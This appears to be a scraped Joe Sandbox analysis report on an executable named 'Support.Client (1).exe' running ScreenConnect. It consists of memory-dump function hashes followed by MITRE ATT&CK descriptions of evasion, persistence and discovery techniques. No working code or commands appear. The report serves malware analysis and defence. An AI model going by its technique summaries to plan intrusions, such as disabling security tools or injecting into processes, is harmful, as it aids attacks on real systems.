Function 00007FFD9B8AB5A9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c69958fb88332faff8b54bf2a0777b890e045662bf5d672154e5169865bae4d
Instruction ID: 2512bde2db786d2c42ecf8c68e75cbf53a497c65c1f34450aeb21583acf8bcb1
Opcode Fuzzy Hash: 5c69958fb88332faff8b54bf2a0777b890e045662bf5d672154e5169865bae4d
Instruction Fuzzy Hash: 82016221B1590D4FE6A8E75C847977473D2FF9C780F550279D45EC72E2DD16AC018710

Function 00007FFD9BBB847A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f45213903d3307b42289be7bb4b83c03f4335fe17ee8c173e522fae3677d006
Instruction ID: bb65d5e59b135ee9446625c5d462cf8e4acd3013a1f31dfbd5e1c4bbe84f8287
Opcode Fuzzy Hash: 6f45213903d3307b42289be7bb4b83c03f4335fe17ee8c173e522fae3677d006
Instruction Fuzzy Hash: 1D01A23254E7D84FD76216A19C245823FA4EF87328B0A01EBE088CB0A3D2595916C722

Function 00007FFD9B8ADA75 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85de1c1f381ff34658f77dd83857816cd408d1184b21288a2ac7c46156a97f9f
Instruction ID: cf6c4cf8158c08994a18c6b28ab24337c67168933a1703b69e40a5ae35a27ec2
Opcode Fuzzy Hash: 85de1c1f381ff34658f77dd83857816cd408d1184b21288a2ac7c46156a97f9f
Instruction Fuzzy Hash: C401A270A4E79D8FEB58EB58C5A57BC7FA0EF58300F4104A9D009D71A2DAB86980C751

Function 00007FFD9B8B21A5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f5dfe51332f36d4b5de1b2f199e610409ca0e3011624c1bb98631fd3a04fe5f
Instruction ID: dc3ae80c8c2104d030cc2717da9991546be60bc4e008092f8a807b3e350538ec
Opcode Fuzzy Hash: 9f5dfe51332f36d4b5de1b2f199e610409ca0e3011624c1bb98631fd3a04fe5f
Instruction Fuzzy Hash: 44F0623194E7CD8FCB52DBB89C258997FB0EE17310B0A01DBE184CB1B3C2189948C792

Function 00007FFD9B8ACE50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d0901132d1b395841db96b5bf1d89d918c1656f42ccb8e0f453528f467db13
Instruction ID: 5d6903e2abf9cab24db8f7e0c668916e7c5774cc3aaadbbc30d6994a454b7d8e
Opcode Fuzzy Hash: 17d0901132d1b395841db96b5bf1d89d918c1656f42ccb8e0f453528f467db13
Instruction Fuzzy Hash: 6BF0A4A2B1AE4A4BEBB4CB6C9C6912123C9EFAC7907054176E45CC72A5FD18FC214751

Function 00007FFD9B8B0F41 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea659bf9fe8f459a3454e67a4876fcd49a6f40768c3b097ed3dc990d938f75a
Instruction ID: 5f27d6c03c71842e9b1180703946a6cfa312336091f80b0f2d92b61902169084
Opcode Fuzzy Hash: cea659bf9fe8f459a3454e67a4876fcd49a6f40768c3b097ed3dc990d938f75a
Instruction Fuzzy Hash: B7F0963190955C4FCB41DF68D819EEA7BF0FF69301B0541E7D449C7162D6249958CBC1

Function 00007FFD9B8ACEE7 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 146034a174e1c174d2e34ef941bb1ef5a25356dae6f67f02fc46b4e3682b4c02
Instruction ID: 0fb6d2d40548b74f3db9a2f5d6ed4478a791176bb1c89e0607623acc65bc2a5e
Opcode Fuzzy Hash: 146034a174e1c174d2e34ef941bb1ef5a25356dae6f67f02fc46b4e3682b4c02
Instruction Fuzzy Hash: 54F05053B2BE8E0BE7A4D67C5C5D66227C6DF6C29030401BAD04DC71AAFD54AC078791

Function 00007FFD9B8ACBE0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0650249a71c4fe0f0b1e873fea9b2c9f4fc5774218b371ee8aeb4e8e6c973447
Instruction ID: 94c4af3bdebe619c5ddd4a177402e17dec926fef7286886a33149c91a5ec04a5
Opcode Fuzzy Hash: 0650249a71c4fe0f0b1e873fea9b2c9f4fc5774218b371ee8aeb4e8e6c973447
Instruction Fuzzy Hash: F3F0E770A04A0C8FCF48EF58C808AEA7BF1FF68315F01426AE40DE3260DB71A944CB81

Function 00007FFD9B8AD300 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f66a716ef494c34f5e75166d2b7cf4080908523d5a37e1e815c93f5cae7a11
Instruction ID: 2b6e5aee6f0f2027788917963a802336b315b5f1c020ef026e4fccb141df7e06
Opcode Fuzzy Hash: d2f66a716ef494c34f5e75166d2b7cf4080908523d5a37e1e815c93f5cae7a11
Instruction Fuzzy Hash: B1F06230E4DA5D8FEB58FB98D1917BC7AE0EB58340F410875D01DD3191DEB46A40C751

Function 00007FFD9BBB3BD5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56c923ed0e197f560280aac9909f60ebbec1dc0ff183bc3c2d9b83b2e1dc182
Instruction ID: dfa263d0823e408daf221f52931b3414e9277d14c643dac9479b890673cbc7b3
Opcode Fuzzy Hash: d56c923ed0e197f560280aac9909f60ebbec1dc0ff183bc3c2d9b83b2e1dc182
Instruction Fuzzy Hash: D0F0A710F1983D0BE768A66854343BD72C2EF8931CF4250B9D01EC21DACD695D828289

Function 00007FFD9BBB3A89 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
Instruction ID: f295a0ee6a93d2f078803a0cc6b74074e595a50ec7c46eab78c38fafe3a340e6
Opcode Fuzzy Hash: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
Instruction Fuzzy Hash: 4BF06D3540D68C9FCB43EBA8D4608D67F70EE56320B0501DBE089CB462E7218A59CB82

Function 00007FFD9BBB09B1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
Instruction ID: 8c73db76ff580fcf5bf1b785c1f9cdcfe26c1c1fe72090cbe834ed9ac469646d
Opcode Fuzzy Hash: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
Instruction Fuzzy Hash: B5E0926150F7D40FD752973884698E17FA0EE1321034900EBD5818F4B3E5158649C741

Function 00007FFD9B8B17F8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d093d9cd389b64bf4b505a2f2072e8c0a41e8a827f073fe163d9f4c3e99627c1
Instruction ID: 985bdf9e3e324c06e5e340ce2b58caf4d29698e12a056e56dbe944726261a0b4
Opcode Fuzzy Hash: d093d9cd389b64bf4b505a2f2072e8c0a41e8a827f073fe163d9f4c3e99627c1
Instruction Fuzzy Hash: F1E0483170990D4FDB94FB6CE454AA4B3D2EF5931535405B5D00DCB299DE26DC81C741

Function 00007FFD9B8AC671 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3f6e5f50901d40dbd45c3327db374454ee52fc879442ddef8a3c42f7836153
Instruction ID: 2f73fe7ed687cee0e2bc33546a5ac8da5e2aa12dc8a875997230c4e97ae6e5fd
Opcode Fuzzy Hash: 1f3f6e5f50901d40dbd45c3327db374454ee52fc879442ddef8a3c42f7836153
Instruction Fuzzy Hash: 18E09270D0F1894FD721CBB5CC289E53FB4AF5B61070E82FAD0488B0A7D61C6505CB61

Function 00007FFD9BBB81F2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3c0c5d323ac1e91a60f49860947319ff1fe59ad5326303b44e03a29af54ffe
Instruction ID: e1c535ab2595aeea426b735f5e52b0bdbf858cb6d5864963ec9edbd87587bd40
Opcode Fuzzy Hash: 4d3c0c5d323ac1e91a60f49860947319ff1fe59ad5326303b44e03a29af54ffe
Instruction Fuzzy Hash: FEE01D52F5ED5D0EE5B1765C24551F525D1EB98650B450177D41DC62E7DC18AD820340

Function 00007FFD9BBB4720 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad00d85d095bbda0d44eee684f28b313e4cbad55f42107357b95933ed0a83c1
Instruction ID: 0504c7a0fadcc6651042b57e1d188dd941a6eda02095d76401154a78c8e7abc9
Opcode Fuzzy Hash: 0ad00d85d095bbda0d44eee684f28b313e4cbad55f42107357b95933ed0a83c1
Instruction Fuzzy Hash: 95E08C25A4E62B02FB7C22A668A13B660C1EF06304F4A407E942D814E9DD6C9E80C552

Function 00007FFD9B8AFFD0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a9dd74072b6fd81f867b5c15ccd04aca5688ba39aeb091c1f58cf1e3c5b5c3
Instruction ID: 2b55242d6b5abc4e7c9328a85fa385e6a2377ab1f0b78c6c706ccb1991bdb5fa
Opcode Fuzzy Hash: e6a9dd74072b6fd81f867b5c15ccd04aca5688ba39aeb091c1f58cf1e3c5b5c3
Instruction Fuzzy Hash: 15E0C221A1EE184FE7A86338145617169D0DF9D300B1809ABE40CC23B6E8190D400295

Function 00007FFD9B8AE9AB Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d3fd8c98feb44641ca59a13b7e23b3f2731a317c7878e83cc778aa3c0c9501
Instruction ID: d022423cc30bd59c4ace7f165a98df2ce490fabbe7c2c93dd8be632725fdf28e
Opcode Fuzzy Hash: 60d3fd8c98feb44641ca59a13b7e23b3f2731a317c7878e83cc778aa3c0c9501
Instruction Fuzzy Hash: F5D0221270FBC90EF36682EC18A00107F91CA5A0A132C06EBC848CA0B3D80909C443B0

Function 00007FFD9B8ABAB8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 062d3aa903849585295b4a14120ff8d4ad9a259fc5dfdfbddb07ce55233f975d
Instruction ID: 9e54a19ff75631c5ab15edbec8a3094c8e082686c0d1dcee6b64047bec50b928
Opcode Fuzzy Hash: 062d3aa903849585295b4a14120ff8d4ad9a259fc5dfdfbddb07ce55233f975d
Instruction Fuzzy Hash: DCD01220E1F50E4ADAB4EBE5DC592E435E4AB1D320F8A5234F009C3198E66C65A4CB51

Function 00007FFD9B8AE991 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea6b134e97bb88af46140c9f16cc50fcea1b9819faaadafba435c11886e0743
Instruction ID: f7c52bea00ff9f31049f1b78502c2ec06421734050894edcde8936bc9f1ee7ea
Opcode Fuzzy Hash: 2ea6b134e97bb88af46140c9f16cc50fcea1b9819faaadafba435c11886e0743
Instruction Fuzzy Hash: 84C08C02E0A68D1BFBA1669800E52A00181DB69302F44002AA408C20A3DC0858468320

Function 00007FFD9BBB2914 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4116c7a3dd2b23c5d7b7a71601d6cbc29020410e66618db0316f244ef266f61
Instruction ID: 93863d18f0831f138613243f3057e83bf1bab0e4bfea8c61cd7d3a4e1fa3eae3
Opcode Fuzzy Hash: b4116c7a3dd2b23c5d7b7a71601d6cbc29020410e66618db0316f244ef266f61
Instruction Fuzzy Hash: C7C09B10F1A55E4AF164EBE484712BE65527F8C604B564435D00D831D6CD3C67015955

Analysis Process: ScreenConnect.WindowsClient.exePID: 4112, Parent PID: 1012COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	2

Executed Functions

Function 00007FFD9BBB957C Relevance: 1.8, APIs: 1, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2900666851.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 982256283e0ed62156fd84ad2663af0e4bff0839b0d2d9075cf00450aca12155
Instruction ID: dad9d8490902c87cddf4b180a8877eb6dc9bf520a64a80fe52cde63cc050ef4a
Opcode Fuzzy Hash: 982256283e0ed62156fd84ad2663af0e4bff0839b0d2d9075cf00450aca12155
Instruction Fuzzy Hash: E0712931A0E69D4FE775CAA888296BA7FE0FF56314F0501BED08EC75E3DA1469098B41

Function 00007FFD9B8A8014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8142

Memory Dump Source

Source File: 0000000E.00000002.2897658814.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 4f79e3610a7465e3170357f9b26aaa3a3f4376a6daf9eab8372ba07fa9dcbcb4
Instruction ID: 405f20167fad445eea1326e9242622b29d925e16992375463adf450b9002a785
Opcode Fuzzy Hash: 4f79e3610a7465e3170357f9b26aaa3a3f4376a6daf9eab8372ba07fa9dcbcb4
Instruction Fuzzy Hash: 93414B31D0DB584FDB28AFA8984A5E97BE0EF59310F04017FE449C3192DF78A946CBA1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Support.Client (1).exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

